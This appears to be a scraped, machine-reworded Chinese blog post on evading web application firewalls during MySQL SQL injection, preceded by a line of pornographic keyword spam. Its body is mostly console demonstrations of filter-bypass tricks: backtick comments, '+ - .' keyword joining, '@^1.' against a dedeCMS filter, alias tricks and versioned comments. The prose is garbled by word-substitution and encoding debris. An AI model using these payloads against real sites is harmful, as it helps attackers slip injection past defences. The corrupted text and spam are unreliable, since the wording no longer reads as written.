国产精品香蕉在线观看网,亚洲欧美精品综合在线观看,亚洲不卡av一区二区无码不卡,亚洲日本精品国产第一区二区

　　本文中，筆者與大年夜家分享了幾個WAF繞過的技能。對一些大年夜家都體味的技能如：/*!*/,SELECT[0x09,0x0A-0x0D,0x20,0xA0]xx FROM 不再重造輪子。

　　Mysql：

　　tips1: 奇異的 ` (格局輸出表的阿誰節(jié)制符)

　　過空格 過一些正則。

　　mysql> select`version`()

　　-> ;

　　+----------------------+

　　| `version`() |

　　+----------------------+

　　| 5.1.50-community-log |

　　+----------------------+

　　1 row in set (0.00 sec)

　　一個更好玩的技能，這個` 節(jié)制符可以當(dāng)注釋符用(限制前提)。

　　mysql> select id from qs_admins where id=1;`dfff and comment it;

　　+----+

　　| id |

　　+----+

　　| 1 |

　　+----+

　　1 row in set (0.00 sec)

　　`>usage : where id =’0′`’***xcomment on.

　　tips2:奇異的“- + .”：

　　mysql> select id from qs_admins;

　　+----+

　　| id |

　　+----+

　　| 1 |

　　+----+

　　1 row in set (0.00 sec)

　　mysql> select+id-1+1.from qs_admins;

　　+----------+

　　| +id-1+1. |

　　+----------+

　　| 1 |

　　+----------+

　　1 row in set (0.00 sec)

　　mysql> select-id-1+3.from qs_admins;

　　+----------+

　　| -id-1+3. |

　　+----------+

　　| 1 |

　　+----------+

　　1 row in set (0.00 sec)

　　(有些人不是一向在說關(guān)頭字如何過？過濾一個from … 就是如許連起來過)

　　tips3: @

　　mysql> select@^1.from qs_admins;

　　+------+

　　| @^1. |

　　+------+

　　| NULL |

　　+------+

　　這個是bypass 曾dedeCMS filter。

　　或下面如許也是可以的：

　　tips4：mysql function() as *** 也能夠不消as 和空格

　　mysql> select-count(id)test from qs_admins;

　　+------+

　　| test |

　　+------+

　　| -1 |

　　+------+

　　1 row in set (0.00 sec)

　　tips5:/*![>5000]*/ 新機(jī)關(guān) 版本號(這個可能有些過時了。)

　　mysql> /*!40000select*/ id from qs_admins;